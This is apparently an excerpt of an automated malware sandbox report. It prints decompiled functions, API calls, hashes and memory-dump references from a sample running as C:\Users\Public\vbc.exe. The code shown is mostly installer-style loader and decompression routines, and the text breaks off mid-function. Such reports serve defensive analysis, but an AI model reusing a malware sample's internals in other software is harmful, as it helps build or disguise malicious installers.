                                                  • Instruction ID: c25a7037d2469be4335b8e9940eeaad57ca25a66f44a15dc7ff8fd6819e2376f
                                                  • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                  • Instruction Fuzzy Hash: 030108B1D14219EAEF119FA4CC047EFBFB8EB14354F004176D904B6280D7B8A604DFAA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405EBA, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00405EBA(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x409010; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                                  0x00405ed1
                                                  0x00405eda
                                                  0x00405edc
                                                  0x00405edc
                                                  0x00405ee0
                                                  0x00405ef2
                                                  0x00405eec
                                                  0x00405eec
                                                  0x00405eec
                                                  0x00405ef6
                                                  0x00405f0a
                                                  0x00405f1e
                                                  0x00405f25

                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405ED1
                                                  • wsprintfA.USER32 ref: 00405F0A
                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00405F1E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%s.dll$UXTHEME$\
                                                  • API String ID: 2200240437-4240819195
                                                  • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                                  • Instruction ID: e0394f74180a6a16eba84a37178681bb1de021cb3750537530e5e19d16d25b78
                                                  • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                                  • Instruction Fuzzy Hash: AFF09C3094050967DB159B68DD0DFFB365CF708305F1405B7B586E11C2DA74E9158FD9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 73067051, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 237processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessW.KERNEL32(?,00000000), ref: 73067195
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.477866753.0000000073066000.00000040.00020000.sdmp, Offset: 73050000, based on PE: true
                                                  • Associated: 00000004.00000002.477833776.0000000073050000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477841571.0000000073051000.00000020.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477858734.0000000073061000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477871923.0000000073068000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477876122.0000000073069000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477882302.000000007306B000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID: D
                                                  • API String ID: 963392458-2746444292
                                                  • Opcode ID: d81ae3570c6d9ce0ba658299d0292c25fdf6ee4d4aa23e0e2dbf9f9625a56a96
                                                  • Instruction ID: 649b9898069b655f5cb7f6d93223c9182bbdcd72cb23db60a9d00d854ba1ccc5
                                                  • Opcode Fuzzy Hash: d81ae3570c6d9ce0ba658299d0292c25fdf6ee4d4aa23e0e2dbf9f9625a56a96
                                                  • Instruction Fuzzy Hash: 2BA1F774E00209EFDB41DFA4C984BAEBBFABF48B05F104465E516EB298D734AA41CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040589E, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040589E(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                  0x004058a2
                                                  0x004058a8
                                                  0x004058a9
                                                  0x004058a9
                                                  0x004058aa
                                                  0x004058b1
                                                  0x004058bb
                                                  0x004058c8
                                                  0x004058cb
                                                  0x004058d3
                                                  0x00000000
                                                  0x00000000
                                                  0x004058d7
                                                  0x00000000
                                                  0x00000000
                                                  0x004058d9
                                                  0x00000000
                                                  0x004058d9
                                                  0x00000000

                                                  APIs
                                                  • GetTickCount.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\vbc.exe" ,004030F9,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 004058B1
                                                  • GetTempFileNameA.KERNEL32(?,0061736E,00000000,?), ref: 004058CB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-1498418707
                                                  • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                  • Instruction ID: e60e9e2f6482c2c4b9a71223117799e22c549444224f45eff9547ee1bfe60b0e
                                                  • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                  • Instruction Fuzzy Hash: 46F0A7373482447AE7105E55DC04B9B7F9DDFD1750F10C027FE049A280D6B49954C7A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 73066000, Relevance: 7.7, APIs: 5, Instructions: 208fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 730669B3
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.477866753.0000000073066000.00000040.00020000.sdmp, Offset: 73050000, based on PE: true
                                                  • Associated: 00000004.00000002.477833776.0000000073050000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477841571.0000000073051000.00000020.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477858734.0000000073061000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477871923.0000000073068000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477876122.0000000073069000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477882302.000000007306B000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: ab59c1b20c1dde64f4d58aec016aa6f95cd9ab3b0899d4df1767026884839d36
                                                  • Instruction ID: 3bdc14973048494ca16acb2aa55795b0c2631b2851ad4b23ea851863f7e10bf6
                                                  • Opcode Fuzzy Hash: ab59c1b20c1dde64f4d58aec016aa6f95cd9ab3b0899d4df1767026884839d36
                                                  • Instruction Fuzzy Hash: 70710E39E5034CEAEB50CBE4E951BEDBBB5AF48B10F20541AE518EA2E4E7701E41DB05
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401F84, Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 60%
                                                  			E00401F84(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x423ff8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x423fc8 =  *0x423fc8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402A29(0xfffffff0);
				 *(_t34 + 8) = E00402A29(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404E84(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x425000, 0x40b010, 0x409000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E0040358B(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                  0x00401f84
                                                  0x00401f84
                                                  0x00401f89
                                                  0x00401f90
                                                  0x0040204c
                                                  0x00402197
                                                  0x00402197
                                                  0x004028be
                                                  0x004028c1
                                                  0x004028cd
                                                  0x004028cd
                                                  0x00401f9f
                                                  0x00401fa9
                                                  0x00401fac
                                                  0x00401fbb
                                                  0x00401fbf
                                                  0x00401fc5
                                                  0x00401fc9
                                                  0x00402045
                                                  0x00000000
                                                  0x00402045
                                                  0x00401fcb
                                                  0x00401fd5
                                                  0x00401fd9
                                                  0x0040201d
                                                  0x00401fdb
                                                  0x00401fde
                                                  0x00401fe1
                                                  0x00402011
                                                  0x00401fe3
                                                  0x00401fe6
                                                  0x00401fef
                                                  0x00401ff1
                                                  0x00401ff1
                                                  0x00401fef
                                                  0x00401fe1
                                                  0x00402025
                                                  0x0040203a
                                                  0x0040203a
                                                  0x00000000
                                                  0x00402025
                                                  0x00401faf
                                                  0x00401fb5
                                                  0x00401fb9
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FAF
                                                    • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                                    • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                                    • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                                    • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                                    • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F18
                                                    • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F32
                                                    • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F40
                                                  • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
                                                  • GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 00401FCF
                                                  • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2987980305-0
                                                  • Opcode ID: 50cd007fc7b77623f8c7ad5bc39ef5e257e3bb497f63aa12232a7c38023ecf07
                                                  • Instruction ID: 27648393275eec621602a0353e8cc2bfbc6c1dadd98057bfccdba155e6fc7477
                                                  • Opcode Fuzzy Hash: 50cd007fc7b77623f8c7ad5bc39ef5e257e3bb497f63aa12232a7c38023ecf07
                                                  • Instruction Fuzzy Hash: 07215732D04215ABDF216FA48F4DAAE7970AF44354F60423FFA11B22E0CBBC4981D65E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004015B3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E004015B3(char __ebx) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402A29(0xfffffff0);
				_t13 = E0040571F(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E004056B6(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004053C3(_t28);
						} else {
							_t38 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004053E0(_t38) == 0) {
								goto L5;
							} else {
								_t22 = E00405346(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405B98("C:\\Users\\Albus\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                                                  0x004015b3
                                                  0x004015ba
                                                  0x004015bd
                                                  0x004015c2
                                                  0x004015c6
                                                  0x004015c8
                                                  0x004015d0
                                                  0x004015d2
                                                  0x004015d4
                                                  0x004015d8
                                                  0x004015db
                                                  0x004015f3
                                                  0x004015f4
                                                  0x004015dd
                                                  0x004015dd
                                                  0x004015e0
                                                  0x00000000
                                                  0x004015eb
                                                  0x004015ec
                                                  0x004015ec
                                                  0x004015e0
                                                  0x004015fb
                                                  0x00401602
                                                  0x0040160f
                                                  0x0040160f
                                                  0x00401604
                                                  0x00401605
                                                  0x0040160d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040160d
                                                  0x00401602
                                                  0x00401612
                                                  0x00401615
                                                  0x00401617
                                                  0x00401618
                                                  0x004015c8
                                                  0x0040161f
                                                  0x0040164a
                                                  0x00402197
                                                  0x00401621
                                                  0x00401623
                                                  0x0040162e
                                                  0x00401634
                                                  0x0040163c
                                                  0x00401642
                                                  0x00401642
                                                  0x0040163c
                                                  0x004028c1
                                                  0x004028cd

                                                  APIs
                                                    • Part of subcall function 0040571F: CharNextA.USER32(004054D1), ref: 0040572D
                                                    • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405732
                                                    • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405741
                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                    • Part of subcall function 00405346: CreateDirectoryA.KERNEL32(?,?,00000000), ref: 00405389
                                                  • SetCurrentDirectoryA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp, xrefs: 00401629
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                  • String ID: C:\Users\user\AppData\Local\Temp
                                                  • API String ID: 1892508949-2935972921
                                                  • Opcode ID: 2bf56f72201c9e699422734a4e548a5e4c3f3c6807ff828ac4a79b9dc522e826
                                                  • Instruction ID: 7e794a0d764ef42534189bc4677109bd04a63590121f3ac1906b169044d7ab5d
                                                  • Opcode Fuzzy Hash: 2bf56f72201c9e699422734a4e548a5e4c3f3c6807ff828ac4a79b9dc522e826
                                                  • Instruction Fuzzy Hash: 67112B35504141ABEF317BA55D419BF26B0EE92314728063FF582722D2C63C0943A62F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406609, Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 99%
                                                  			E00406609() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00406A77))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8)); // executed
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
